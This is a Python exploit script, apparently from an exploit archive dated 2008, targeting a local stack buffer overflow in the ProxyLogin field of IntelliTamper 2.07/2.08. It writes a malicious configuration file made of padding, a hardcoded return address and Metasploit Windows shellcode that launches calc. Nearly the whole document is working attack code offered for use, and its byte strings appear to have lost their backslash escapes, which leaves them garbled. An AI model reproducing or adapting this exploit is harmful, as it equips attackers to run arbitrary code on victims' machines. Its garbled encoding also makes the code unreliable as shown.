[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : IntelliTamper 2.07/2.08 (ProxyLogin) Local Stack Overflow Exploit
# Published : 2008-12-29
# Author : His0k4
# Previous Title : PHP <= 5.2.8 gd library - imageRotate() Information Leak Vulnerability
# Next Title : Linux Kernel < 2.6.26.4 SCTP Kernel Memory Disclosure Exploit


#usage: exploit.py
print "**************************************************************************"
print " IntelliTamper 2.07/2.08 (ProxyLogin) Local Stack Overflown"
print " Author: His0k4"
print " Tested on: Windows XP Pro SP2 Frn"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)n"
print "**************************************************************************"
         	

			
header = (
	"x2Fx2Fx20x49x6Ex74x65x6Cx6Cx69x54x61x6Dx70"
	"x65x72x20x63x6Fx6Ex66x69x67x75x72x61x74x69"
	"x6Fx6Ex20x66x69x6Cx65x0Ax0Ax46x6Fx6Cx64x65"
	"x72x73x44x69x63x74x69x6Fx6Ex6Ex61x72x79x3D"
	"x44x69x63x74x69x6Fx6Ex6Ex61x72x79x43x6Cx61"
	"x73x73x69x63x2Ex74x78x74x0Ax54x65x78x74x43"
	"x61x74x61x6Cx6Fx67x3Dx43x3Ax5Cx50x72x6Fx67"
	"x72x61x6Dx20x46x69x6Cx65x73x5Cx49x6Ex74x65"
	"x6Cx6Cx69x54x61x6Dx70x65x72x5Cx49x6Ex74x65"
	"x6Cx6Cx69x54x61x6Dx70x65x72x5Fx55x53x2Ex63"
	"x61x74x0Ax55x73x65x50x72x6Fx78x79x41x75x74"
	"x68x3Dx31x0Ax50x72x6Fx78x79x4Cx6Fx67x69x6E"
	"x3D"
	)
	
header2 = "x0Ax50x72x6Fx78x79x50x61x73x73x77x6Fx72x64x3D"	
			
buff = "x41" * 245

EIP = "x5Dx38x82x7C" #call ESP from kernel32.dll

nop = "x90" * 12  #Blah Blah :D

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
	"x29xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xc9"
	"x2cxc9x40x83xebxfcxe2xf4x35xc4x8dx40xc9x2cx42x05"
	"xf5xa7xb5x45xb1x2dx26xcbx86x34x42x1fxe9x2dx22x09"
	"x42x18x42x41x27x1dx09xd9x65xa8x09x34xcexedx03x4d"
	"xc8xeex22xb4xf2x78xedx44xbcxc9x42x1fxedx2dx22x26"
	"x42x20x82xcbx96x30xc8xabx42x30x42x41x22xa5x95x64"
	"xcdxefxf8x80xadxa7x89x70x4cxecxb1x4cx42x6cxc5xcb"
	"xb9x30x64xcbxa1x24x22x49x42xacx79x40xc9x2cx42x28"
	"xf5x73xf8xb6xa9x7ax40xb8x4axecxb2x10xa1xdcx43x44"
	"x96x44x51xbex43x22x9exbfx2ex4fxa8x2cxaax02xacx38"
	"xacx2cxc9x40"
    )

exploit = header + buff + EIP + nop + shellcode + header2

try:
    out_file = open("exploit.cfg",'w')
    out_file.write(exploit)
    out_file.close()
    raw_input("nExploit file created!n")
except:
    print "Error"

# www.Syue.com [2008-12-29]